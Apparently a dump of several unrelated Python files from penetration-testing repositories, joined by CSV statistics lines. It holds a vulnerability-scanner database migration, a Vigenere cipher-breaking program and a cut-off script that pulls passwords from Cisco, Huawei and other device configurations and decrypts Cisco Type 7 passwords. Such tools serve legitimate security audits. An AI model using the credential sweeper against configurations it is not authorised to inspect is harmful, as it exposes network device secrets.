('form_name', self.gf('django.db.models.fields.CharField')(max_length=512, blank=True)),
('form_method', self.gf('django.db.models.fields.CharField')(default='GET', max_length=10)),
('form_action', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
('form_content', self.gf('django.db.models.fields.TextField')(blank=True)),
('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('input_field_list', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Form'])
# Adding model 'InputField'
db.create_table(u'xtreme_server_inputfield', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('input_type', self.gf('django.db.models.fields.CharField')(default='input', max_length=256, blank=True)),
))
db.send_create_signal(u'xtreme_server', ['InputField'])
# Adding model 'Vulnerability'
db.create_table(u'xtreme_server_vulnerability', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('details', self.gf('django.db.models.fields.TextField')(blank=True)),
('url', self.gf('django.db.models.fields.TextField')(blank=True)),
('re_attack', self.gf('django.db.models.fields.TextField')(blank=True)),
('project', self.gf('django.db.models.fields.TextField')(blank=True)),
('timestamp', self.gf('django.db.models.fields.TextField')(blank=True)),
('msg_type', self.gf('django.db.models.fields.TextField')(blank=True)),
('msg', self.gf('django.db.models.fields.TextField')(blank=True)),
('auth', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Vulnerability'])
# Adding model 'Settings'
db.create_table(u'xtreme_server_settings', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
('consider_only', self.gf('django.db.models.fields.TextField')()),
('exclude_fields', self.gf('django.db.models.fields.TextField')()),
('username', self.gf('django.db.models.fields.TextField')()),
('password', self.gf('django.db.models.fields.TextField')()),
('auth_mode', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'xtreme_server', ['Settings'])
# Adding model 'LearntModel'
db.create_table(u'xtreme_server_learntmodel', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Page'])),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('query_id', self.gf('django.db.models.fields.TextField')()),
('learnt_model', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['LearntModel'])
def backwards(self, orm):
# Deleting model 'BlindProject'
db.delete_table(u'xtreme_server_blindproject')
# Deleting model 'Project'
db.delete_table(u'xtreme_server_project')
# Deleting model 'Page'
db.delete_table(u'xtreme_server_page')
# Deleting model 'Form'
db.delete_table(u'xtreme_server_form')
# Deleting model 'InputField'
db.delete_table(u'xtreme_server_inputfield')
# Deleting model 'Vulnerability'
db.delete_table(u'xtreme_server_vulnerability')
# Deleting model 'Settings'
db.delete_table(u'xtreme_server_settings')
# Deleting model 'LearntModel'
db.delete_table(u'xtreme_server_learntmodel')
models = {
u'xtreme_server.blindproject': {
'Meta': {'object_name': 'BlindProject'},
'blind_URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'match_string': ('django.db.models.fields.TextField', [], {}),
'method': ('django.db.models.fields.TextField', [], {}),
'param_name': ('django.db.models.fields.TextField', [], {}),
'param_value': ('django.db.models.fields.TextField', [], {}),
'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'project_status': ('django.db.models.fields.TextField', [], {}),
'public_IP': ('django.db.models.fields.TextField', [], {}),
'success_flg': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.form': {
'Meta': {'object_name': 'Form'},
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'form_action': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'form_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'form_method': ('django.db.models.fields.CharField', [], {'default': "'GET'", 'max_length': '10'}),
'form_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_field_list': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"})
},
u'xtreme_server.inputfield': {
'Meta': {'object_name': 'InputField'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_type': ('django.db.models.fields.CharField', [], {'default': "'input'", 'max_length': '256', 'blank': 'True'})
},
u'xtreme_server.learntmodel': {
'Meta': {'object_name': 'LearntModel'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'learnt_model': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Page']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'query_id': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.page': {
'Meta': {'object_name': 'Page'},
'URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'connection_details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'status_code': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'xtreme_server.project': {
'Meta': {'object_name': 'Project'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'auth_parameters': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
'login_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'logout_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'password': ('django.db.models.fields.TextField', [], {}),
'password_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'query_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'queueName': ('django.db.models.fields.TextField', [], {'default': "'-1'"}),
'start_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Not Set'", 'max_length': '50'}),
'username': ('django.db.models.fields.TextField', [], {}),
'username_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"})
},
u'xtreme_server.settings': {
'Meta': {'object_name': 'Settings'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.TextField', [], {}),
'username': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.vulnerability': {
'Meta': {'object_name': 'Vulnerability'},
'auth': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msg': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'msg_type': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
're_attack': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'timestamp': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
complete_apps = ['xtreme_server'] | 64.259109 | 130 | 0.56955 |
Mastering-Machine-Learning-for-Penetration-Testing | from sklearn.svm import LinearSVC
from sklearn.datasets import load_iris
from sklearn.feature_selection import SelectFromModel
iris = load_iris()
X, y = iris.data, iris.target
X.shape
lsvc = LinearSVC(C=0.01, penalty="l1", dual=False).fit(X, y)
model = SelectFromModel(lsvc, prefit=True)
X_new = model.transform(X)
X_new.shape
| 24.384615 | 60 | 0.759878 |
cybersecurity-penetration-testing | import xlsxwriter
from datetime import datetime
school_data = [['Computer Science', 235, 3.44, datetime(2015, 07, 23, 18, 00, 00)],
['Chemistry', 201, 3.26, datetime(2015, 07, 25, 9, 30, 00)],
['Forensics', 99, 3.8, datetime(2015, 07, 23, 9, 30, 00)],
['Astronomy', 115, 3.21, datetime(2015, 07, 19, 15, 30, 00)]]
def writeXLSX(data):
workbook = xlsxwriter.Workbook('MyWorkbook.xlsx')
main_sheet = workbook.add_worksheet('MySheet')
date_format = workbook.add_format({'num_format': 'mm/dd/yy hh:mm:ss AM/PM'})
length = str(len(data) + 1)
main_sheet.add_table(('A1:D' + length), {'data': data,
'columns': [{'header': 'Department'}, {'header': 'Students'},
{'header': 'Cumulative GPA'},
{'header': 'Final Date', 'format': date_format}]})
department_grades = workbook.add_chart({'type':'column'})
department_grades.set_title({'name':'Department and Grade distribution'})
department_grades.add_series({'categories':'=MySheet!$A$2:$A$5', 'values':'=MySheet!$C$2:$C$5'})
main_sheet.insert_chart('A8', department_grades)
workbook.close()
writeXLSX(school_data)
| 44 | 107 | 0.549847 |
cybersecurity-penetration-testing | # Vigenere Cipher Hacker
# http://inventwithpython.com/hacking (BSD Licensed)
import itertools, re
import vigenereCipher, pyperclip, freqAnalysis, detectEnglish
LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
SILENT_MODE = False # if set to True, program doesn't print attempts
NUM_MOST_FREQ_LETTERS = 4 # attempts this many letters per subkey
MAX_KEY_LENGTH = 16 # will not attempt keys longer than this
NONLETTERS_PATTERN = re.compile('[^A-Z]')
def main():
# Instead of typing this ciphertext out, you can copy & paste it
# from http://invpy.com/vigenereHacker.py
ciphertext = """Adiz Avtzqeci Tmzubb wsa m Pmilqev halpqavtakuoi, lgouqdaf, kdmktsvmztsl, izr xoexghzr kkusitaaf. Vz wsa twbhdg ubalmmzhdad qz hce vmhsgohuqbo ox kaakulmd gxiwvos, krgdurdny i rcmmstugvtawz ca tzm ocicwxfg jf "stscmilpy" oid "uwydptsbuci" wabt hce Lcdwig eiovdnw. Bgfdny qe kddwtk qjnkqpsmev ba pz tzm roohwz at xoexghzr kkusicw izr vrlqrwxist uboedtuuznum. Pimifo Icmlv Emf DI, Lcdwig owdyzd xwd hce Ywhsmnemzh Xovm mby Cqxtsm Supacg (GUKE) oo Bdmfqclwg Bomk, Tzuhvif'a ocyetzqofifo ositjm. Rcm a lqys ce oie vzav wr Vpt 8, lpq gzclqab mekxabnittq tjr Ymdavn fihog cjgbhvnstkgds. Zm psqikmp o iuejqf jf lmoviiicqg aoj jdsvkavs Uzreiz qdpzmdg, dnutgrdny bts helpar jf lpq pjmtm, mb zlwkffjmwktoiiuix avczqzs ohsb ocplv nuby swbfwigk naf ohw Mzwbms umqcifm. Mtoej bts raj pq kjrcmp oo tzm Zooigvmz Khqauqvl Dincmalwdm, rhwzq vz cjmmhzd gvq ca tzm rwmsl lqgdgfa rcm a kbafzd-hzaumae kaakulmd, hce SKQ. Wi 1948 Tmzubb jgqzsy Msf Zsrmsv'e Qjmhcfwig Dincmalwdm vt Eizqcekbqf Pnadqfnilg, ivzrw pq onsaafsy if bts yenmxckmwvf ca tzm Yoiczmehzr uwydptwze oid tmoohe avfsmekbqr dn eifvzmsbuqvl tqazjgq. Pq kmolm m dvpwz ab ohw ktshiuix pvsaa at hojxtcbefmewn, afl bfzdakfsy okkuzgalqzu xhwuuqvl jmmqoigve gpcz ie hce Tmxcpsgd-Lvvbgbubnkq zqoxtawz, kciup isme xqdgo otaqfqev qz hce 1960k. Bgfdny'a tchokmjivlabk fzsmtfsy if i ofdmavmz krgaqqptawz wi 1952, wzmz vjmgaqlpad iohn wwzq goidt uzgeyix wi tzm Gbdtwl Wwigvwy. Vz aukqdoev bdsvtemzh rilp rshadm tcmmgvqg (xhwuuqvl uiehmalqab) vs sv mzoejvmhdvw ba dmikwz. Hpravs rdev qz 1954, xpsl whsm tow iszkk jqtjrw pug 42id tqdhcdsg, rfjm ugmbddw xawnofqzu. Vn avcizsl lqhzreqzsy tzif vds vmmhc wsa eidcalq; vds ewfvzr svp gjmw wfvzrk jqzdenmp vds vmmhc wsa mqxivmzhvl. Gv 10 Esktwunsm 2009, fgtxcrifo mb Dnlmdbzt uiydviyv, Nfdtaat Dmiem Ywiikbqf Bojlab Wrgez avdw iz cafakuog pmjxwx ahwxcby gv nscadn at ohw Jdwoikp scqejvysit xwd "hce sxboglavs kvy zm ion tjmmhzd." Sa at Haq 2012 i bfdvsbq azmtmd'g widt ion bwnafz tzm Tcpsw wr Zjrva ivdcz eaigd yzmbo Tmzubb a kbmhptgzk dvrvwz wa efiohzd."""
hackedMessage = hackVigenere(ciphertext)
if hackedMessage != None:
print('Copying hacked message to clipboard:')
print(hackedMessage)
pyperclip.copy(hackedMessage)
else:
print('Failed to hack encryption.')
def findRepeatSequencesSpacings(message):
# Goes through the message and finds any 3 to 5 letter sequences
# that are repeated. Returns a dict with the keys of the sequence and
# values of a list of spacings (num of letters between the repeats).
# Use a regular expression to remove non-letters from the message.
message = NONLETTERS_PATTERN.sub('', message.upper())
# Compile a list of seqLen-letter sequences found in the message.
seqSpacings = {} # keys are sequences, values are list of int spacings
for seqLen in range(3, 6):
for seqStart in range(len(message) - seqLen):
# Determine what the sequence is, and store it in seq
seq = message[seqStart:seqStart + seqLen]
# Look for this sequence in the rest of the message
for i in range(seqStart + seqLen, len(message) - seqLen):
if message[i:i + seqLen] == seq:
# Found a repeated sequence.
if seq not in seqSpacings:
seqSpacings[seq] = [] # initialize blank list
# Append the spacing distance between the repeated
# sequence and the original sequence.
seqSpacings[seq].append(i - seqStart)
return seqSpacings
def getUsefulFactors(num):
# Returns a list of useful factors of num. By "useful" we mean factors
# less than MAX_KEY_LENGTH + 1. For example, getUsefulFactors(144)
# returns [2, 72, 3, 48, 4, 36, 6, 24, 8, 18, 9, 16, 12]
if num < 2:
return [] # numbers less than 2 have no useful factors
factors = [] # the list of factors found
# When finding factors, you only need to check the integers up to
# MAX_KEY_LENGTH.
for i in range(2, MAX_KEY_LENGTH + 1): # don't test 1
if num % i == 0:
factors.append(i)
factors.append(int(num / i))
if 1 in factors:
factors.remove(1)
return list(set(factors))
def getItemAtIndexOne(x):
return x[1]
def getMostCommonFactors(seqFactors):
# First, get a count of how many times a factor occurs in seqFactors.
factorCounts = {} # key is a factor, value is how often if occurs
# seqFactors keys are sequences, values are lists of factors of the
# spacings. seqFactors has a value like: {'GFD': [2, 3, 4, 6, 9, 12,
# 18, 23, 36, 46, 69, 92, 138, 207], 'ALW': [2, 3, 4, 6, ...], ...}
for seq in seqFactors:
factorList = seqFactors[seq]
for factor in factorList:
if factor not in factorCounts:
factorCounts[factor] = 0
factorCounts[factor] += 1
# Second, put the factor and its count into a tuple, and make a list
# of these tuples so we can sort them.
factorsByCount = []
for factor in factorCounts:
# exclude factors larger than MAX_KEY_LENGTH
if factor <= MAX_KEY_LENGTH:
# factorsByCount is a list of tuples: (factor, factorCount)
# factorsByCount has a value like: [(3, 497), (2, 487), ...]
factorsByCount.append( (factor, factorCounts[factor]) )
# Sort the list by the factor count.
factorsByCount.sort(key=getItemAtIndexOne, reverse=True)
return factorsByCount
def kasiskiExamination(ciphertext):
# Find out the sequences of 3 to 5 letters that occur multiple times
# in the ciphertext. repeatedSeqSpacings has a value like:
# {'EXG': [192], 'NAF': [339, 972, 633], ... }
repeatedSeqSpacings = findRepeatSequencesSpacings(ciphertext)
# See getMostCommonFactors() for a description of seqFactors.
seqFactors = {}
for seq in repeatedSeqSpacings:
seqFactors[seq] = []
for spacing in repeatedSeqSpacings[seq]:
seqFactors[seq].extend(getUsefulFactors(spacing))
# See getMostCommonFactors() for a description of factorsByCount.
factorsByCount = getMostCommonFactors(seqFactors)
# Now we extract the factor counts from factorsByCount and
# put them in allLikelyKeyLengths so that they are easier to
# use later.
allLikelyKeyLengths = []
for twoIntTuple in factorsByCount:
allLikelyKeyLengths.append(twoIntTuple[0])
return allLikelyKeyLengths
def getNthSubkeysLetters(n, keyLength, message):
# Returns every Nth letter for each keyLength set of letters in text.
# E.g. getNthSubkeysLetters(1, 3, 'ABCABCABC') returns 'AAA'
# getNthSubkeysLetters(2, 3, 'ABCABCABC') returns 'BBB'
# getNthSubkeysLetters(3, 3, 'ABCABCABC') returns 'CCC'
# getNthSubkeysLetters(1, 5, 'ABCDEFGHI') returns 'AF'
# Use a regular expression to remove non-letters from the message.
message = NONLETTERS_PATTERN.sub('', message)
i = n - 1
letters = []
while i < len(message):
letters.append(message[i])
i += keyLength
return ''.join(letters)
def attemptHackWithKeyLength(ciphertext, mostLikelyKeyLength):
# Determine the most likely letters for each letter in the key.
ciphertextUp = ciphertext.upper()
# allFreqScores is a list of mostLikelyKeyLength number of lists.
# These inner lists are the freqScores lists.
allFreqScores = []
for nth in range(1, mostLikelyKeyLength + 1):
nthLetters = getNthSubkeysLetters(nth, mostLikelyKeyLength, ciphertextUp)
# freqScores is a list of tuples like:
# [(<letter>, <Eng. Freq. match score>), ... ]
# List is sorted by match score. Higher score means better match.
# See the englishFreqMatchScore() comments in freqAnalysis.py.
freqScores = []
for possibleKey in LETTERS:
decryptedText = vigenereCipher.decryptMessage(possibleKey, nthLetters)
keyAndFreqMatchTuple = (possibleKey, freqAnalysis.englishFreqMatchScore(decryptedText))
freqScores.append(keyAndFreqMatchTuple)
# Sort by match score
freqScores.sort(key=getItemAtIndexOne, reverse=True)
allFreqScores.append(freqScores[:NUM_MOST_FREQ_LETTERS])
if not SILENT_MODE:
for i in range(len(allFreqScores)):
# use i + 1 so the first letter is not called the "0th" letter
print('Possible letters for letter %s of the key: ' % (i + 1), end='')
for freqScore in allFreqScores[i]:
print('%s ' % freqScore[0], end='')
print() # print a newline
# Try every combination of the most likely letters for each position
# in the key.
for indexes in itertools.product(range(NUM_MOST_FREQ_LETTERS), repeat=mostLikelyKeyLength):
# Create a possible key from the letters in allFreqScores
possibleKey = ''
for i in range(mostLikelyKeyLength):
possibleKey += allFreqScores[i][indexes[i]][0]
if not SILENT_MODE:
print('Attempting with key: %s' % (possibleKey))
decryptedText = vigenereCipher.decryptMessage(possibleKey, ciphertextUp)
if detectEnglish.isEnglish(decryptedText):
# Set the hacked ciphertext to the original casing.
origCase = []
for i in range(len(ciphertext)):
if ciphertext[i].isupper():
origCase.append(decryptedText[i].upper())
else:
origCase.append(decryptedText[i].lower())
decryptedText = ''.join(origCase)
# Check with user to see if the key has been found.
print('Possible encryption hack with key %s:' % (possibleKey))
print(decryptedText[:200]) # only show first 200 characters
print()
print('Enter D for done, or just press Enter to continue hacking:')
response = input('> ')
if response.strip().upper().startswith('D'):
return decryptedText
# No English-looking decryption found, so return None.
return None
def hackVigenere(ciphertext):
# First, we need to do Kasiski Examination to figure out what the
# length of the ciphertext's encryption key is.
allLikelyKeyLengths = kasiskiExamination(ciphertext)
if not SILENT_MODE:
keyLengthStr = ''
for keyLength in allLikelyKeyLengths:
keyLengthStr += '%s ' % (keyLength)
print('Kasiski Examination results say the most likely key lengths are: ' + keyLengthStr + '\n')
for keyLength in allLikelyKeyLengths:
if not SILENT_MODE:
print('Attempting hack with key length %s (%s possible keys)...' % (keyLength, NUM_MOST_FREQ_LETTERS ** keyLength))
hackedMessage = attemptHackWithKeyLength(ciphertext, keyLength)
if hackedMessage != None:
break
# If none of the key lengths we found using Kasiski Examination
# worked, start brute-forcing through key lengths.
if hackedMessage == None:
if not SILENT_MODE:
print('Unable to hack message with likely key length(s). Brute forcing key length...')
for keyLength in range(1, MAX_KEY_LENGTH + 1):
# don't re-check key lengths already tried from Kasiski
if keyLength not in allLikelyKeyLengths:
if not SILENT_MODE:
print('Attempting hack with key length %s (%s possible keys)...' % (keyLength, NUM_MOST_FREQ_LETTERS ** keyLength))
hackedMessage = attemptHackWithKeyLength(ciphertext, keyLength)
if hackedMessage != None:
break
return hackedMessage
# If vigenereHacker.py is run (instead of imported as a module) call
# the main() function.
if __name__ == '__main__':
main() | 48.19305 | 2,052 | 0.660675 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Script intendend to sweep Cisco, Huawei and possibly other network devices
# configuration files in order to extract plain and cipher passwords out of them.
# Equipped with functionality to decrypt Cisco Type 7 passwords.
#
# Mariusz Banach, mgeeky '18-20
#
import re
import os
import sys
import argparse
#
# In order to extend capabilities of this script, one can add custom entries
# to the below dictionary. Contents are:
# regexes = {
# 'Technology' : {
# 'Pattern Name' : r'pattern',
# }
# }
#
regexes = {
'Cisco' : {
'Enable secret' : r'enable secret \d+ \bcrypt',
'Privileged command level password' : r'password \password',
'Enable password' : r'enable password \password',
'Enable password(2)' : r'enable password level \d+ \password',
'Username/password' : r'username \name .*(?:password|secret \d) \password',
'HSRP Authentication string' : r'standby \d+ authentication \password',
'HSRP Authentication Text' : r'authentication text \password',
'HSRP Authentication MD5 key-string': r'standby \d+ authentication md5 key-string \keystring',
'OSPF Authentication string' : r'ip ospf authentication-key \password',
'OSPF Authentication MD5 string' : r'ip ospf message-digest-key \d+ md5 \password',
'EIGRP Key-string' : r'key-string \password',
'BGP Neighbor Authentication' : r'neighbor (\ip) password 7 \hash',
'AAA RADIUS Server Auth-Key' : r'server-private \ip auth-port \d+ acct-port \d+ key \d+ \hash',
'NTP Authentication MD5 Key' : r'ntp authentication-key \d+ md5 \password \d',
'TACACS-Server' : r'tacacs-server host \ip key \d \hash',
'RADIUS Server Key' : r'key 7 \hash',
'SNMP-Server User/Password' : r'snmp-server user \name [\w-]+ auth md5 0x\hash priv 0x\hash localizedkey',
'FTP Server Username' : r'ip ftp username \name',
'FTP Server Password' : r'ip ftp password \password',
'ISAKMP Pre-Shared Key' : r'crypto isakmp key \password(?: address \ip)?',
'SNMP-Server User Auth & Encr keys' : r'snmp-server user \name .* encrypted auth md5 ([0-9a-f\:]+) priv aes \d+ ([0-9a-f\:]+)',
'PPP PAP Sent Username & Password' : r'ppp pap sent-username \name password \password',
'AAA TACACS+/RADIUS Server Private' : r'server-private \ip key \password',
'AAA TACACS+ Server Private' : r'tacacs-server key \password',
'SNMP Server Community string' : r'snmp-server community \password',
'IPSec VPN ISAKMP Pre-Shared Key' : r'pre-shared-key address \ip key \password'
},
'Cisco ASA' : {
'Username and Password' : r'username \name .*password \password',
'LDAP Login password' : r'ldap-login-password \password',
'SNMP-Server authentication' : r'snmp-server user \name snmp-read-only-group v\d engineID \hash encrypted auth md5 ([0-9a-fA-F\:]+) priv aes 256 ([0-9a-fA-F\:]+)',
},
'Huawei' : {
'VTY User interface' : r'set authentication password cipher \password',
'Local User' : r'local-user \name password (?:cipher|irreversible-cipher) \password',
'NTP Authentication' : r'ntp-service authentication-keyid \d+ authentication-mode (md5|hmac-sha256) (?:cipher)?\s*\password',
'RADIUS Server Shared-Key' : r'radius-server shared-key cipher \password',
'RADIUS Server Authorization' : r'radius-server authorization \ip shared-key cipher \password',
'TACACS-Server Shared-Key Cipher' : r'hwtacacs-server shared-key cipher \password',
'SNMP-Agent Authentication MD5' : r'snmp-agent [\w-]+ v\d \name authentication-mode md5 \password',
'SNMP-Agent Authentication AES' : r'snmp-agent [\w-]+ v\d \name privacy-mode aes128 \password',
},
'Checkpoint gateway' : {
'SNMP User' : r'add snmp usm user \name security-level \w+ auth-pass-phrase-hashed \hash privacy-pass-phrase-hashed \hash privacy-protocol DES',
'Expert Password Hash' : r'set expert-password-hash \bcrypt',
'TACACS Authentication Key' : r'add aaa tacacs-servers priority \d+ server \ip key \password',
'User password-hash' : r'set user \name password-hash \bcrypt',
},
'F5 BIG-IP' : {
'Username and password' : r'manage user table create \name -pw \password',
'Configuration Sync Password' : r'redundancy config-sync sync-session-password set \password',
},
'PaloAlto Proxy' : {
'Active Directory Auth password' : r'<bind-password>([^<]+)</bind-password>',
'NTLM Password' : r'<ntlm-password>([^<]+)</ntlm-password>',
'Agent User key' : r'<agent-user-override-key>([^<]+)</agent-user-override-key>',
'User Password Hash' : r'<phash>([^<]+)</phash>',
},
'Others' : {
'Other uncategorized password' : r'.* password \password.*',
'Other uncategorized XML password' : r'password>([^<]+)<',
'Other uncategorized authentication string' : r'.* authentication \password.*',
'Other hash-key related' : r'.* key \hash',
'Cisco 7 Password' : r'\cisco7',
},
}
config = {
'verbose' : False,
'debug' : False,
'lines' : 0,
'format' : 'normal',
'csv_delimiter' : ';',
'no_others' : False,
'filename' : False,
'nonunique' : False,
'output' : ''
}
markers = {
'name' : r'([\w-]+|\"[\w-]+\")',
'ip' : r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}',
'domain' : r'(([a-zA-Z]{1})|([a-zA-Z]{1}[a-zA-Z]{1})|([a-zA-Z]{1}[0-9]{1})|([0-9]{1}[a-zA-Z]{1})|([a-zA-Z0-9][a-zA-Z0-9-_]{1,61}[a-zA-Z0-9]))\.([a-zA-Z]{2,6}|[a-zA-Z0-9-]{2,30}\.[a-zA-Z]{2,3})',
'hash' : r'([a-fA-F0-9]{20,})',
'bcrypt' : r'([\$\w\.\/]+)',
'password': r'(?:(?:\d\s+)?([^\s]+))',
'cisco7' : r'\b(?:7 ([0-9a-f]{4,}))|(?:([0-9a-f]{4,}) 7)\b',
'keystring': r'([a-f0-9]+)',
}
foundCreds = set()
maxTechnologyWidth = 0
maxRegexpWidth = 0
results = []
class Logger:
@staticmethod
def _out(x):
if config['debug'] or config['verbose']:
sys.stdout.write(x + '\n')
@staticmethod
def dbg(x):
if config['debug']:
sys.stdout.write('[dbg] ' + x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[?] ' + x)
@staticmethod
def err(x):
Logger._out('[!] ' + x)
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
def processRegex(inputRegex):
for marker in markers:
if '\\' + marker in inputRegex:
inputRegex = inputRegex.replace('\\' + marker, markers[marker])
inputRegex = '^\\s*{}\\s*.*$'.format(inputRegex)
return inputRegex
def cisco7Decrypt(data):
# source: https://github.com/theevilbit/ciscot7
xlat = [
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41, 0x2c, 0x2e,
0x69, 0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44,
0x48, 0x53, 0x55, 0x42, 0x73, 0x67, 0x76, 0x63, 0x61, 0x36, 0x39,
0x38, 0x33, 0x34, 0x6e, 0x63, 0x78, 0x76, 0x39, 0x38, 0x37, 0x33,
0x32, 0x35, 0x34, 0x6b, 0x3b, 0x66, 0x67, 0x38, 0x37
]
dp = ''
regex = re.compile(r'(^[0-9A-Fa-f]{2})([0-9A-Fa-f]+)')
result = regex.search(data)
try:
if result:
s, e = int(result.group(1)), result.group(2)
for pos in range(0, len(e), 2):
magic = int(e[pos] + e[pos+1], 16)
newchar = ''
if s <= 50:
# xlat length is 51
newchar = '%c' % (magic ^ xlat[s])
s += 1
if s == 51: s = 0
dp += newchar
return dp
return ''
except:
return ''
def tryToCisco7Decrypt(creds):
if not len(creds):
return ''
decrypted = []
for m in re.finditer(markers['cisco7'], creds, re.I):
f = m.group(2) if m.group(2) != None else m.group(1)
out = cisco7Decrypt(f)
if out:
decrypted.append(out)
if len(decrypted):
return " (decrypted cisco 7: '" + "', '".join(decrypted) + "')"
return ''
def matchLines(file, lines, technology):
global foundCreds
global results
num = 0
for rex in regexes[technology]:
for idx in range(len(lines)):
line = lines[idx].strip()
if not config['nonunique'] and line in foundCreds:
continue
processedRex = processRegex(regexes[technology][rex])
matched = re.match(processedRex, line, re.I)
if matched:
num += 1
foundCreds.add(line)
f = [x for x in matched.groups(1) if type(x) == str]
creds = '", "'.join(f)
creds += tryToCisco7Decrypt(line)
results.append((
file, technology, rex, creds
))
if config['lines'] != 0:
Logger._out('\n[+] {}: {}: {}'.format(
technology, rex, creds
))
if idx - config['lines'] >= 0:
for i in range(idx - config['lines'], idx):
Logger._out('[{:04}]\t\t{}'.format(i, lines[i]))
Logger._out('[{:04}]==>\t{}'.format(idx, line))
if idx + 1 + config['lines'] < len(lines):
for i in range(idx + 1, idx + config['lines'] + 1):
Logger._out('[{:04}]\t\t{}'.format(i, lines[i]))
Logger.dbg('\tRegex used: [ {} ]'.format(processedRex))
return num
def processFile(file):
lines = []
Logger.info('Processing file: "{}"'.format(file))
try:
